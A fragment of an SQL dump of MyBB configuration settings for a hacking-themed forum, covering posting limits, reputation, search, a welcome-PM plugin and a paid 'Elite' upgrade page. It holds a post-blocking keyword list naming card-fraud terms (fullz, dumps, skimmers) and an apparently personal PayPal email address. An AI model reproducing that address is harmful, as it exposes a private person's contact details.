'Show forum statistics', 'Do you want to show the total number of posts, threads, members and the last registered member on the portal page?', 'yesno', '0', '5', '12', '1'); INSERT INTO mybb_settings VALUES('114', 'portal_showwol', 'Show Who\'s Online', 'Do you want to show the \'Who\'s online\' information to users when they visit the portal page?', 'yesno', '0', '6', '12', '1'); INSERT INTO mybb_settings VALUES('115', 'portal_showsearch', 'Show Search Box', 'Do you want to show the search box, allowing users to quickly search the forums on the portal?', 'yesno', '0', '7', '12', '1'); INSERT INTO mybb_settings VALUES('116', 'portal_showdiscussions', 'Show Latest Discussions', 'Do you wish to show the current forum discussions on the portal page?', 'yesno', '0', '8', '12', '1'); INSERT INTO mybb_settings VALUES('117', 'portal_showdiscussionsnum', 'Number of latest discussions to show', 'Please enter the number of current forum discussions to show on the portal page.', 'text', '0', '9', '12', '1'); INSERT INTO mybb_settings VALUES('118', 'minmessagelength', 'Minimum Message Length', 'The minimum number of characters to post.', 'text', '25', '1', '13', '1'); INSERT INTO mybb_settings VALUES('119', 'maxmessagelength', 'Maximum Message Length', 'The maximum number of characters (bytes) to allow in a message. A setting of 0 allows an unlimited length.\n<br />This should correlate with the message column type in the posts database table, and adjust accordingly. Below are the maximum lengths for each column type.\n<ul>\n <li>TEXT: 65535 (default)</li>\n <li>MEDIUMTEXT: 16777215</li>\n <li>LONGTEXT: 4294967295</li>\n</ul>', 'text', '65535', '2', '13', '1'); INSERT INTO mybb_settings VALUES('120', 'maxposts', 'Maximum Posts Per Day', 'This is the total number of posts allowed per user per day. 0 for unlimited.', 'text', '0', '3', '13', '1'); INSERT INTO mybb_settings VALUES('121', 'postfloodcheck', 'Post Flood Checking', 'Set to on if you want to enable flood checking for posts. Specify the time between posts below.', 'onoff', '1', '4', '13', '1'); INSERT INTO mybb_settings VALUES('122', 'postfloodsecs', 'Post Flood Time', 'Set the time (in seconds) users have to wait between posting, to be in effect; the option above must be on.', 'text', '25', '5', '13', '1'); INSERT INTO mybb_settings VALUES('123', 'postmergemins', 'Post Merge Time', 'With this enabled, posts posted within x minutes by the same author right after each other, will be merged. Set the time limit (in minutes) to merge posts. Set to 0 or leave blank to disable this feature. Default: 60', 'text', '1440', '6', '13', '1'); INSERT INTO mybb_settings VALUES('124', 'postmergefignore', 'Merge Forums to Ignore', 'Forums, separated by a comma, to exclude from the auto merge feature. Leave blank to disable.', 'text', '3, 49, 50, 11, 23, 33', '7', '13', '1'); INSERT INTO mybb_settings VALUES('125', 'postmergeuignore', 'Merge User Groups to Ignore', 'Usergroups, separated by a comma, to exclude from the merge feature. Default: 4 (Administrator). Leave blank to disable.', 'text', '4', '8', '13', '1'); INSERT INTO mybb_settings VALUES('126', 'postmergesep', 'Merge Separator', 'The Separator to be used when merging two message Default: \'[hr]\'', 'text', '[hr]', '9', '13', '1'); INSERT INTO mybb_settings VALUES('127', 'logip', 'Log Posting IP Addresses', 'Do you wish to log ip addresses of users who post, and who you want to show ip addresses to?', 'radio\nno=Do not log IP\nhide=Show to Admins & Mods\nshow=Show to all Users', 'hide', '10', '13', '1'); INSERT INTO mybb_settings VALUES('128', 'showeditedby', 'Show \'edited by\' Messages', 'Once a post is edited by a regular user, do you want to show the edited by message?', 'yesno', '1', '11', '13', '1'); INSERT INTO mybb_settings VALUES('129', 'showeditedbyadmin', 'Show \'edited by\' Message for Forum Staff', 'Do you want to show edited by messages for forum staff when they edit their posts?', 'yesno', '1', '12', '13', '1'); INSERT INTO mybb_settings VALUES('130', 'maxpostimages', 'Maximum Images per Post', 'Enter the maximum number of images (including smilies) a user can put in their post. Set to 0 to disable this.', 'text', '15', '13', '13', '1'); INSERT INTO mybb_settings VALUES('131', 'maxpostvideos', 'Maximum Videos per Post', 'Enter the maximum number of videos a user can put in their post. Set to 0 to disable this.', 'text', '3', '14', '13', '1'); INSERT INTO mybb_settings VALUES('132', 'subscribeexcerpt', 'Amount of Characters for Subscription Previews', 'How many characters of the post do you want to send with the email notification of a new reply?', 'text', '100', '15', '13', '1'); INSERT INTO mybb_settings VALUES('133', 'maxattachments', 'Maximum Attachments Per Post', 'The maximum number of attachments a user is allowed to upload per post.', 'text', '5', '16', '13', '1'); INSERT INTO mybb_settings VALUES('134', 'attachthumbnails', 'Show Attached Thumbnails in Posts', 'How do you want images to be shown in posts?', 'radio\nyes=Thumbnail\nno=Full Size Image\ndownload=As Download Link', 'yes', '17', '13', '1'); INSERT INTO mybb_settings VALUES('135', 'attachthumbh', 'Attached Thumbnail Maximum Height', 'Enter the height that attached thumbnails should be generated at.', 'text', '96', '18', '13', '1'); INSERT INTO mybb_settings VALUES('136', 'attachthumbw', 'Attached Thumbnail Maximum Width', 'Enter the width that attached thumbnails should be generated at.', 'text', '96', '19', '13', '1'); INSERT INTO mybb_settings VALUES('137', 'edittimelimit', 'Edit Time Limit', 'The number of minutes until regular users cannot edit their own posts (if they have the permission). Enter 0 (zero) for no limit.', 'text', '', '20', '13', '1'); INSERT INTO mybb_settings VALUES('138', 'wordwrap', 'Number of Characters before Word Wrapping Occurs', 'The maximum number of characters that can be present in a word before a space is automatically inserted. (helps preservation of the forum layout). Set to 0 to disable.', 'text', '80', '21', '13', '1'); INSERT INTO mybb_settings VALUES('139', 'maxquotedepth', 'Maximum Nested Quote Tags', 'The maximum depth level for quote tags. When quote-replying to a post, all nested quotes which exceed this threshold are automatically removed. Note that this value is only enforced when quote-replying - it is still possible to manually enter quotes to exceed this limit, and this setting will not affect posts already submitted. Set to 0 to disable.', 'text', '5', '22', '13', '1'); INSERT INTO mybb_settings VALUES('140', 'polloptionlimit', 'Maximum Poll Option Length', 'The maximum length that each poll option can be. (Set to 0 to disable).', 'text', '250', '23', '13', '1'); INSERT INTO mybb_settings VALUES('141', 'maxpolloptions', 'Maximum Number of Poll Options', 'The maximum number of options for polls that users can post.', 'text', '10', '24', '13', '1'); INSERT INTO mybb_settings VALUES('142', 'threadreview', 'Show Thread Review', 'Show recent posts when creating a new reply?', 'yesno', '1', '25', '13', '1'); INSERT INTO mybb_settings VALUES('143', 'enablepms', 'Enable Private Messaging Functionality', 'If you wish to disable the private messaging system on your board, set this option to no.', 'yesno', '1', '1', '14', '1'); INSERT INTO mybb_settings VALUES('144', 'pmsallowhtml', 'Allow HTML', 'Selecting yes will allow HTML to be used in private messages.', 'yesno', '0', '2', '14', '1'); INSERT INTO mybb_settings VALUES('145', 'pmsallowmycode', 'Allow MyCode', 'Selecting yes will allow MyCode to be used in private messages.', 'yesno', '1', '3', '14', '1'); INSERT INTO mybb_settings VALUES('146', 'pmsallowsmilies', 'Allow Smilies', 'Selecting yes will allow Smilies to be used in private messages.', 'yesno', '1', '4', '14', '1'); INSERT INTO mybb_settings VALUES('147', 'pmsallowimgcode', 'Allow [img] Code', 'Selecting yes will allow [img] Code to be used in private messages.', 'yesno', '0', '5', '14', '1'); INSERT INTO mybb_settings VALUES('148', 'pmsallowvideocode', 'Allow [video] Code', 'Selecting yes will allow [video] Code to be used in private messages.', 'yesno', '0', '6', '14', '1'); INSERT INTO mybb_settings VALUES('149', 'pmfloodsecs', 'Private Message Flood Time', 'Set the time (in seconds) users have to wait between sending messages, to be in effect; set to 0 to disable.', 'text', '30', '7', '14', '1'); INSERT INTO mybb_settings VALUES('150', 'enablereputation', 'Enable Reputation Functionality', 'If you wish to disable the reputation system on your board, set this option to no.', 'yesno', '1', '1', '15', '1'); INSERT INTO mybb_settings VALUES('151', 'posrep', 'Allow Positive Reputation', 'Allow users to give others positive reputation?', 'yesno', '1', '2', '15', '1'); INSERT INTO mybb_settings VALUES('152', 'negrep', 'Allow Negative Reputation', 'Allow users to give others negative reputation?', 'yesno', '1', '3', '15', '1'); INSERT INTO mybb_settings VALUES('153', 'neurep', 'Allow Neutral Reputation', 'Allow users to give others neutral reputation?', 'yesno', '1', '4', '15', '1'); INSERT INTO mybb_settings VALUES('154', 'multirep', 'Allow Multiple Reputation', 'Can users give multiple reputations to the same user?<br />Note: Does not effect \"Post\" reputation', 'yesno', '0', '5', '15', '1'); INSERT INTO mybb_settings VALUES('155', 'postrep', 'Allow Post Reputations', 'Enable reputation to be linked to posts?', 'yesno', '0', '6', '15', '1'); INSERT INTO mybb_settings VALUES('156', 'repsperpage', 'Reputation Comments Per Page', 'Here you can enter the number of reputation comments to show per page on the reputation system', 'text', '15', '7', '15', '1'); INSERT INTO mybb_settings VALUES('157', 'maxreplength', 'Maximum Reputation Length', 'The maximum number of characters a reputation can be.', 'text', '150 ', '8', '15', '1'); INSERT INTO mybb_settings VALUES('158', 'searchtype', 'Search Type', 'Please select the type of search system you wish to use. You can either chose between \"Standard\", or \"Full Text\" (depending on your database). Fulltext searching is more powerful than the standard MyBB searching and quicker too.', 'php\n<select name=\\\"upsetting[{$setting[\'name\']}]\\\"><option value=\\\"standard\\\">\".($lang->setting_searchtype_standard?$lang->setting_searchtype_standard:\"Standard\").\"</option>\".($db->supports_fulltext(\"threads\") && $db->supports_fulltext_boolean(\"posts\")?\"<option value=\\\"fulltext\\\"\".($setting[\'value\']==\"fulltext\"?\" selected=\\\"selected\\\"\":\"\").\">\".($lang->setting_searchtype_fulltext?$lang->setting_searchtype_fulltext:\"Full Text\").\"</option>\":\"\").\"</select>', 'standard', '1', '16', '1'); INSERT INTO mybb_settings VALUES('159', 'searchfloodtime', 'Search Flood Time (seconds)', 'Enter the time in seconds for the minimum allowed interval for searching. This prevents users from overloading your server by constantly performing searches. Set to 0 to disable.', 'text', '30', '2', '16', '1'); INSERT INTO mybb_settings VALUES('160', 'minsearchword', 'Minimum Search Word Length', 'Enter the minimum number of characters an individual word in a search query can be. Set to 0 to disable (and accept the hard limit default of 3 for standard searching and 4 for MySQL fulltext searching). If you use MySQL fulltext searching and set this lower than the MySQL setting - MySQL will override it.', 'text', '2', '3', '16', '1'); INSERT INTO mybb_settings VALUES('161', 'searchhardlimit', 'Hard Limit for Maximum Search Results', 'Enter the maximum amount of results to be processed. Set to 0 to disable. On larger boards (more than 1 million posts) this should be set to no more than 1000.', 'text', '100', '4', '16', '1'); INSERT INTO mybb_settings VALUES('162', 'seourls', 'Enable search engine friendly URLs?', 'Search engine friendly URLs change the MyBB links to shorter URLs which search engines prefer and are easier to type. showthread.php?tid=1 becomes thread-1.html. <strong>Once this setting is enabled you need to make sure you have the MyBB .htaccess in your MyBB root directory (or the equivalent for your web server). Automatic detection may not work on all servers.</strong> Please see <a href=\"http://wiki.mybb.com/index.php/SEF_URLS\">The MyBB wiki</a> for assistance.', 'select\nauto=Automatic Detection\nyes=Enabled\nno=Disabled', 'auto', '1', '17', '1'); INSERT INTO mybb_settings VALUES('163', 'seourls_archive', 'Enable search engine friendly URLs in Archive?', 'Search engine friendly URLs can be used in the archive. <strong>Once this setting is enabled ensure the archive still works as expected.</strong>', 'yesno', '1', '2', '17', '1'); INSERT INTO mybb_settings VALUES('164', 'gzipoutput', 'Use GZip Page Compression?', 'Do you want to compress pages in GZip format when they are sent to the browser? This means quicker downloads for your visitors, and less traffic usage for you.', 'yesno', '1', '3', '17', '1'); INSERT INTO mybb_settings VALUES('165', 'gziplevel', 'GZip Page Compression Level', 'Set the level for GZip Page Compression from 0-9. (0=no compression, 9=maximum compression). This will only take effect if GZip Page Compression is enabled above and if your PHP version is newer than 4.2. If you use an older version of PHP, the default compression level of the zlib library will be used instead.', 'text', '4', '4', '17', '1'); INSERT INTO mybb_settings VALUES('166', 'nocacheheaders', 'Send No Cache Headers', 'With this option you can prevent caching of the page by the browser.', 'yesno', '0', '5', '17', '1'); INSERT INTO mybb_settings VALUES('167', 'redirects', 'Friendly Redirection Pages', 'This will enable friendly redirection pages instead of bumping the user directly to the page.', 'onoff', '0', '6', '17', '1'); INSERT INTO mybb_settings VALUES('168', 'load', '*NIX Load Limiting', 'Limit the maximum server load before MyBB rejects people. 0 for none. Recommended limit is 5.0.', 'text', '0', '7', '17', '1'); INSERT INTO mybb_settings VALUES('169', 'tplhtmlcomments', 'Output template start/end comments?', 'This will enable or disable the output of template start/end comments in the HTML.', 'yesno', '1', '8', '17', '1'); INSERT INTO mybb_settings VALUES('170', 'use_xmlhttprequest', 'Enable XMLHttp request features?', 'This will enable or disable the XMLHttp request features.', 'yesno', '1', '9', '17', '1'); INSERT INTO mybb_settings VALUES('171', 'extraadmininfo', 'Advanced Stats / Debug information', 'Shows Server load, parse time, generation time, Gzip compression, etc on the bottom of all pages in the root folder. Please note that only administrators see this information.', 'yesno', '1', '10', '17', '1'); INSERT INTO mybb_settings VALUES('172', 'uploadspath', 'Uploads Path', 'The path used for all board uploads. It <b>must be chmod 777</b> (on Unix servers).', 'text', './uploads', '11', '17', '1'); INSERT INTO mybb_settings VALUES('173', 'useerrorhandling', 'Use Error Handling', 'If you do not wish to use the integrated error handling for MyBB, you may turn this option off. However, it is reccommended that it stay on', 'onoff', '1', '12', '17', '1'); INSERT INTO mybb_settings VALUES('174', 'errorlogmedium', 'Error Logging Medium', 'The type of the error handling to use.', 'select\nnone=Neither\nlog=Log errors\nemail=Email errors\nboth=Log and email errors\n', 'both', '13', '17', '1'); INSERT INTO mybb_settings VALUES('175', 'errortypemedium', 'Error Type Medium', 'The type of errors to show.', 'select\nwarning=Warnings\nerror=Errors\nboth=Warnings and Errors\nnone=Hide Errors and Warnings\n', 'both', '14', '17', '1'); INSERT INTO mybb_settings VALUES('176', 'errorloglocation', 'Error Logging Location', 'The location of the log to send errors to, if specified.', 'text', './error.log', '15', '17', '1'); INSERT INTO mybb_settings VALUES('177', 'enableforumjump', 'Enable Forum Jump Menu?', 'The forum jump menu is shown on the forum and thread view pages. It can add significant load to your forums if you have a large amount of forums. Set to \'No\' to disable it.', 'yesno', '0', '16', '17', '1'); INSERT INTO mybb_settings VALUES('178', 'ip_forwarded_check', 'Scrutinize User\'s IP address?', 'Do you want to check a user\'s IP address for HTTP_X_FORWARDED_FOR or HTTP_X_REAL_IP headers? If you\'re unsure, set this to no.', 'yesno', '1', '17', '17', '1'); INSERT INTO mybb_settings VALUES('179', 'postlayout', 'Post Layout', 'Allows you to switch between the classic and new horizontal layout modes. Classic mode shows the author information to the left of the post, horizontal shows the author information above the post.', 'radio\nhorizontal=Display posts using the horizontal post layout\nclassic=Display posts using the classic layout', 'horizontal', '1', '18', '1'); INSERT INTO mybb_settings VALUES('180', 'postsperpage', 'Posts Per Page:', 'The number of posts to display per page. We recommend its not higher than 20 for people with slower connections.', 'text', '10', '2', '18', '1'); INSERT INTO mybb_settings VALUES('181', 'userpppoptions', 'User Selectable Posts Per Page', 'If you would like to allow users to select how many posts are shown per page in a thread, enter the options they should be able to select separated with commas. If this is left blank they will not be able to choose how many posts are shown per page.', 'text', '5,10,20,25,30,40,50', '3', '18', '1'); INSERT INTO mybb_settings VALUES('182', 'postmaxavatarsize', 'Maximum Avatar Dimensions in Posts', 'The maximum dimensions for avatars when being displayed in a post. If an avatar is too large, it will automatically be scaled down.', 'text', '70x70', '4', '18', '1'); INSERT INTO mybb_settings VALUES('183', 'threadreadcut', 'Read Threads in Database (Days)', 'The number of days that you wish to keep thread read information in the database. For large boards, we do not recommend a high number as the board will become slower. Set to 0 to disable.', 'text', '5', '5', '18', '1'); INSERT INTO mybb_settings VALUES('184', 'threadusenetstyle', 'Usenet Style Thread View', 'Selecting yes will cause posts to look similar to how posts look in USENET. No will cause posts to look the modern way.', 'yesno', '0', '6', '18', '1'); INSERT INTO mybb_settings VALUES('185', 'quickreply', 'Show Quick Reply Form', 'Allows you to set whether or not the quick reply form will be shown at the bottom of threads.', 'onoff', '1', '7', '18', '1'); INSERT INTO mybb_settings VALUES('186', 'multiquote', 'Show Multi-quote Buttons', 'The multi-quote button allows users to select a series of posts then click Reply and have those posts quoted in their message.', 'onoff', '0', '8', '18', '1'); INSERT INTO mybb_settings VALUES('187', 'showsimilarthreads', 'Show \'Similar Threads\' Table', 'The Similar Threads table shows threads that are relevant to the thread being read. You can set the relevancy below.', 'yesno', '0', '9', '18', '1'); INSERT INTO mybb_settings VALUES('188', 'similarityrating', 'Similar Threads Relevancy Rating', 'This allows you to limit similar threads to ones more relevant (0 being not relevant). This number should not be over 10 and should not be set low (<5) for large forums. Does not apply to PgSQL databases.', 'text', '1', '10', '18', '1'); INSERT INTO mybb_settings VALUES('189', 'similarlimit', 'Similar Threads Limit', 'Here you can change the total amount of similar threads to be shown in the similar threads table. It is recommended that it is not over 15 for 56k users.', 'text', '10', '11', '18', '1'); INSERT INTO mybb_settings VALUES('190', 'showforumpagesbreadcrumb', 'Show Forum Multipage Dropdown', 'If the forum has more than 1 page of threads, do you want to display a dropdown pagination menu in the breadcrumbs?', 'yesno', '1', '12', '18', '1'); INSERT INTO mybb_settings VALUES('191', 'browsingthisthread', 'Users Browsing this Thread', 'Here you can turn off the \'users browsing this thread\' feature.', 'yesno', '0', '13', '18', '1'); INSERT INTO mybb_settings VALUES('192', 'delayedthreadviews', 'Delayed Thread View Updates', 'If this setting is enabled, the number of thread views for threads will be updated in the background by the task schedule system. If not enabled, thread view counters are incremented instantly.', 'onoff', '0', '14', '18', '1'); INSERT INTO mybb_settings VALUES('193', 'enablewarningsystem', 'Enable Warning System?', 'Set to no to completely disable the warning system.', 'yesno', '1', '1', '19', '1'); INSERT INTO mybb_settings VALUES('194', 'allowcustomwarnings', 'Allow Custom Warning Types?', 'Allow a custom reason and amount of points to be specified by those with permissions to warn users.', 'yesno', '1', '2', '19', '1'); INSERT INTO mybb_settings VALUES('195', 'canviewownwarning', 'Can Users View Own Warnings?', 'Set to yes to allow users to view recent warnings in their User CP and show their warning level to them in their profile.', 'yesno', '1', '3', '19', '1'); INSERT INTO mybb_settings VALUES('196', 'maxwarningpoints', 'Maximum Warning Points', 'The maximum warning points that can be given to a user before it is considered a warning level of 100%.', 'text', '100', '4', '19', '1'); INSERT INTO mybb_settings VALUES('197', 'wolcutoffmins', 'Cut-off Time (mins)', 'The number of minutes before a user is marked offline. Recommended: 15.', 'text', '15', '1', '20', '1'); INSERT INTO mybb_settings VALUES('198', 'refreshwol', 'Refresh Who\'s online page Time (mins)', 'The number of minutes before the \"Who\'s online\" page refreshes. 0 is disabled.', 'text', '5', '16', '20', '1'); INSERT INTO mybb_settings VALUES('199', 'enablepruning', 'Enable user pruning?', 'Set to on to prune users by the specified criteria below.', 'onoff', '0', '1', '21', '1'); INSERT INTO mybb_settings VALUES('200', 'enableprunebyposts', 'Prune user by post count?', 'Set to on to prune users by their number of posts.', 'onoff', '0', '2', '21', '1'); INSERT INTO mybb_settings VALUES('201', 'prunepostcount', 'Post count to prune by', 'Set to prune users less then a specified number of posts.', 'text', '0', '3', '21', '1'); INSERT INTO mybb_settings VALUES('202', 'dayspruneregistered', 'Days registered before pruning by post count', 'Set to prune users whom have been registered for atleast the given amount of days.', 'text', '90', '4', '21', '1'); INSERT INTO mybb_settings VALUES('203', 'pruneunactived', 'Prune unactivated users?', 'Set to on to prune users whom are unactived.', 'onoff', '1', '5', '21', '1'); INSERT INTO mybb_settings VALUES('204', 'dayspruneunactivated', 'Days registered before pruning unactivated users', 'Set to prune users whom have been unactived for atleast the given amount of days.', 'text', '20', '6', '21', '1'); INSERT INTO mybb_settings VALUES('205', 'prunethreads', 'Prune User Posts/Threads', 'For the users that are going to be removed, do you want to remove all of their posts/threads?', 'yesno', '0', '7', '21', '1'); INSERT INTO mybb_settings VALUES('206', 'selfclosegids', 'Self Close Groups', 'Which groups are allowed to close their own threads? Seperate each gid with a comma.(0=disabled)', 'text', '9,3,4', '41', '13', '0'); INSERT INTO mybb_settings VALUES('207', 'selfopengids', 'Self Open Groups', 'Which groups are allowed to open their own threads? Seperate each gid with a comma.(0=disabled)', 'text', '0', '42', '13', '0'); INSERT INTO mybb_settings VALUES('208', 'contact_email', 'Email', 'What email address will contact be sent to?', 'text', 'support@l33thacking.net', '1', '22', '0'); INSERT INTO mybb_settings VALUES('209', 'contact_guests', 'Allow Guest Contact', 'Select yes to give guests the ability to use the contact form.', 'yesno', '1', '2', '22', '0'); INSERT INTO mybb_settings VALUES('210', 'contact_subjects', 'Contact Subjects', 'These are the possible subject choices please seperate each one with a comma.', 'textarea', 'Registration Problem, Stolen/Lost Account, Error(s) or Unable to access LH, Question, Advertising, DMCA, Other', '3', '22', '0'); INSERT INTO mybb_settings VALUES('211', 'contact_type', 'Contact Type', 'How would you prefer to be contacted?', 'select\r\ncontactpm= PM Contact\r\ncontactemail= Email Contact', 'contactemail', '4', '22', '0'); INSERT INTO mybb_settings VALUES('212', 'contact_pmuser', 'Contact PM Username', 'What is the username of the member for PMs if you have chosen PM contact above?', 'text', 'username', '5', '22', '0'); INSERT INTO mybb_settings VALUES('213', 'hotwords', 'Hot Words', 'These are words that will stop a post or thread. Separate each one with a comma.', 'text', 'anarchy, suck, skimmed, card, atm, fullz, skimmers, dumps, visa, mastercard, dumps, bank, tooshort, suck, dick, pussy, vagina, selling, trade, porn, bitch, paypal, cunt, scam', '25', '13', '0'); INSERT INTO mybb_settings VALUES('243', 'hellban_group', 'Usergroup to have hellbanned', 'The group ID of the usergroup to be hellbanned. Have \"x\" (no quotes) to disable plugin.', 'text', '10', '1', '26', '0'); INSERT INTO mybb_settings VALUES('244', 'g33k_welcomepm_enabled', 'Enable/Disable', 'Enable/Disable the sending of Welcome PMs/Emails.\n<script type=\"text/javascript\">\nfunction insertText(value, textarea)\n{\n // Internet Explorer\n if(document.selection)\n {\n textarea.focus();\n var selection = document.selection.createRange();\n selection.text = value;\n }\n // Firefox\n else if(textarea.selectionStart || textarea.selectionStart == \'0\')\n {\n var start = textarea.selectionStart;\n var end = textarea.selectionEnd;\n textarea.value = textarea.value.substring(0, start) + value + textarea.value.substring(end, textarea.value.length);\n }\n else\n {\n textarea.value += value;\n }\n} \n</script>', 'onoff', '1', '1', '27', '0'); INSERT INTO mybb_settings VALUES('245', 'g33k_welcomepm_method', 'PM or Mail or Both', 'Choose whether to send a PM or an Email or both PM and Email.', 'select\npm=PM\nemail=Email\nboth=Both', 'pm', '2', '27', '0'); INSERT INTO mybb_settings VALUES('246', 'g33k_welcomepm_sendwhen', 'When to send the PM/Email', 'Choose when you want to send the PM/Email.<br />This setting is dependent on the Registration Method and whether account creation is instant or requires activation.', 'select\nactivation=Send upon Account Activation\nregister=Send on Registration', 'activation', '3', '27', '0'); INSERT INTO mybb_settings VALUES('247', 'g33k_welcomepm_pm_sender', 'PM Sender User ID', 'Enter the User ID of the user to send the PM from.<br />This setting is only used when sending PMs. Emails are sent using the board settings.', 'text', '1', '4', '27', '0'); INSERT INTO mybb_settings VALUES('248', 'g33k_welcomepm_subject', 'Subject', 'Enter the Subject of the PM/Email to be sent.<br />You can personalize the subject by inserting the user\'s username, board name or board url using the personalize links below.<br /><br /><script type=\"text/javascript\">\n<!--\ndocument.write(\'Personalize: [<a href=\"#\" onclick=\"insertText(\\\'{username}\\\', $(\\\'setting_g33k_welcomepm_subject\\\')); return false;\">Username</a>], [<a href=\"#\" onclick=\"insertText(\\\'{bbname}\\\', $(\\\'setting_g33k_welcomepm_subject\\\')); return false;\">Board Name</a>], [<a href=\"#\" onclick=\"insertText(\\\'{bburl}\\\', $(\\\'setting_g33k_welcomepm_subject\\\')); return false;\">Board URL</a>]\');\n</script>\n', 'textarea', 'Welcome to {bbname}!', '5', '27', '0'); INSERT INTO mybb_settings VALUES('249', 'g33k_welcomepm_message', 'Content', 'Enter the Content of the PM/Email to be sent.<br />You can personalize the message by inserting the user\'s username, board name or board url using the personalize links below.<br /><br /><script type=\"text/javascript\">\n<!--\ndocument.write(\'Personalize: [<a href=\"#\" onclick=\"insertText(\\\'{username}\\\', $(\\\'setting_g33k_welcomepm_message\\\')); return false;\">Username</a>], [<a href=\"#\" onclick=\"insertText(\\\'{bbname}\\\', $(\\\'setting_g33k_welcomepm_message\\\')); return false;\">Board Name</a>], [<a href=\"#\" onclick=\"insertText(\\\'{bburl}\\\', $(\\\'setting_g33k_welcomepm_message\\\')); return false;\">Board URL</a>]\');\n</script>\n', 'textarea', 'Welcome to our forum {username}.\r\n\r\nI am the founder of the L33THacking, if you have any problems or have any questions then feel free to contact any Staff member from our [url=http://l33thacking.net/showteam.php]Staff list[/url].\r\n\r\nFeel free to view our [url=http://l33thacking.net/misc.php?action=help]Help Documents[/url] because answers to most of your questions can be found in the Help Documents.\r\n\r\nHope you enjoy our forums.\r\n\r\n{bbname}\r\n{bburl}', '6', '27', '0'); INSERT INTO mybb_settings VALUES('254', 'dp_title', 'Donation Page Title', 'This is the display title of your donation page.', 'text', 'Elite Upgrade Page', '1', '29', '0'); INSERT INTO mybb_settings VALUES('255', 'dp_guests', 'Guest Access', 'Should guests be allowed to donate?', 'yesno', '0', '2', '29', '0'); INSERT INTO mybb_settings VALUES('256', 'dp_currency', 'Currency', 'What is the currency you wish to be paid in?', 'select\r\nUSD= US Dollars\r\nAUD= Australian Dollars\r\nGBP= British Pound\r\nCAD= Canadian Dollars\r\nJPY= Japanese Yen\r\nDKK= Danish Krone\r\nHKD= Hong Kong Dollar\r\nJPY= Japanese Yen\r\nCHF= Swiss Franc\r\nPLN= Polish Zloty\r\nSGD= Singapore Dollar\r\nEUR= Euro', 'USD', '3', '29', '0'); INSERT INTO mybb_settings VALUES('257', 'dp_email', 'PayPal Email', 'What is your PayPal email address?', 'text', 'kamihafeez@hotmail.com', '4', '29', '0'); INSERT INTO mybb_settings VALUES('258', 'dp_message', 'Donation Page Message', 'What would you like it to say on the donation page? (HTML Permitted)', 'textarea', '<strong style=\"color: green;\"><u>Elite Membership Upgrade Page</u></strong> <Br />\r\n<br />\r\n<b>Benefits of being an Elite</b>\r\n<li>Access all forums</li>\r\n<li>Change Username</li>\r\n<li>PM space of 1000</li>\r\n<li>Delete own posts anytime</li>\r\n<li>Track messages</li>\r\n<li>Less waiting time during posting of new threads and replies\r\n<li>Ability to give reputation to others</li>\r\n<li>Can keep signatures</li>\r\n<li>Can use custom usertitles</li>\r\n<li>Can upload attachments</li>\r\n<li>Can post and vote polls</li>\r\n<li>Eternal support and happiness</li>\r\n<li>Special Elite support userbar</li>\r\n<br />\r\n<img src=\"images/ub/elite1.png\">\r\n<br />\r\n<span style=\"color: green;\">All upgrades are lifetime, we reserve the right to ban, demote or suspend your account anytime without any refunds. By upgrading you agree to not expose, reveal or redistribute VIP contents with others. Any abuse with upgrade privileges will result in a ban or suspension. If you are buying an upgrade for someone else, then PM the transaction ID to t3h jok3r and enter the link of the user who the upgrade is for. All upgrades are on your discretion and all upgrades are lifetime. We do not offer any coupons, but we surely do offer promotions/sales when we feel is the right moment. You also agree that you are responsible for what you do with our websites content. LH is educational site and for legal purposes.</span>\r\n<br />\r\n<br />\r\n<span style=\"color: red;\">1. After buying an upgrade, PM your transaction ID to <a href= http://l33thacking.com/member.php?action=profile&uid=1><strong><span style=\"color: red;\"><i><u>t3h jok3r</u></i></span></strong></a>. <br/>\r\n2. All upgrades can take up to <strong>48 hours</strong>. <br />\r\n3. We are/do <strong>NOT</strong> force the decision of purchasing an upgrade on you, it\'s your choice. <br />\r\n4. We do <strong>NOT</strong> offer refunds on upgrades. <br />\r\n5. You agree to all our terms of service stated above.<br />\r\n</span>', '5', '29', '0'); INSERT INTO mybb_settings VALUES('259', 'dp_value', 'Recommended Donation Amount', 'The amount of money you recommend users to donate (Will appear in textbox by default, do not include currency symbols!)', 'text', '5.00', '6', '29', '0'); INSERT INTO mybb_settings VALUES('260', 'dp_minimum', 'Minimum Donation Amount', 'This is the minimum amount of money required to donate - Recommended: 1, Disable: 0. (Decimal numbers are allowed, do not include currency symbols!)', 'text', '1.00', '7', '29', '0'); INSERT INTO mybb_settings VALUES('261', 'dp_credits', 'Keep MyBBWebHost Credit Line?', 'While we greatly appreciate it if you leave the credits line at the bottom of the Donation Page, it is not required.', 'yesno', '0', '8', '29', '0'); INSERT INTO mybb_settings VALUES('358', 'easyrefer_show', 'Show Referrals', 'Should members be able to view other member referrals?', 'yesno', '1', '13', '9', '0'); INSERT INTO mybb_settings VALUES('317', 'metakeywords', 'Meta Keywords', 'Enter the keywords to be placed for your site. These are sitewide.', 'text', 'monetizing, programs, virus, whitehat, graphics, webmaster, coding, java, exploits, hacking, cracking, web, forum, wifi, facebook, email, porn, social engineering, accounts, ', '20', '7', '0'); INSERT INTO mybb_settings VALUES('318', 'metadescr', 'Meta Description', 'Create a description. This gets displayed on index page.', 'textarea', 'L33T Hacking is a educational hacker community with various discussions on computing.', '21', '7', '0'); INSERT INTO mybb_settings VALUES('357', 'goodbyespammerapikey', 'Stop Forum Spam API Key', 'In order to be able to submit information on a spammer to the Stop Forum Spam database, you need an API key. You can get one of these <a href=\"http://stopforumspam.com/signup\" target=\"_blank\">here</a>. When you have your key, paste it into the box below.', 'text', '', '5', '44', '0'); INSERT INTO mybb_settings VALUES('356', 'goodbyespammerbangroup', 'Ban Usergroup', 'Enter the ID of the usergroup (not the name) to put users into when they get banned. Defaults to 7, the default Banned usergroup. The above setting must be set to \'Ban\' for this to take effect.', 'text', '7', '4', '44', '0'); INSERT INTO mybb_settings VALUES('355', 'goodbyespammerbandelete', 'Ban or Delete Spammers', 'Do you want to ban or delete spammers with this tool?? It will still be optional on the Goodbye Spammer page.', 'radio\nban=Ban (Permanent)\ndelete=Delete', 'ban', '3', '44', '0'); INSERT INTO mybb_settings VALUES('353', 'goodbyespammergroups', 'Allowed Usergroups', 'Enter the ID of the usergroups who are allowed to use Goodbye Spammer.', 'text', '3,4,6', '1', '44', '0'); INSERT INTO mybb_settings VALUES('354', 'goodbyespammerpostlimit', 'Post Limit', 'This setting stops this tool being used on users who have more than a certain amount of posts, to prevent it being used on active members. Setting the value to 0 will disable the post check, however this is not recommended.', 'text', '10', '2', '44', '0'); INSERT INTO mybb_settings VALUES('302', 'ForumsRequirements_title', 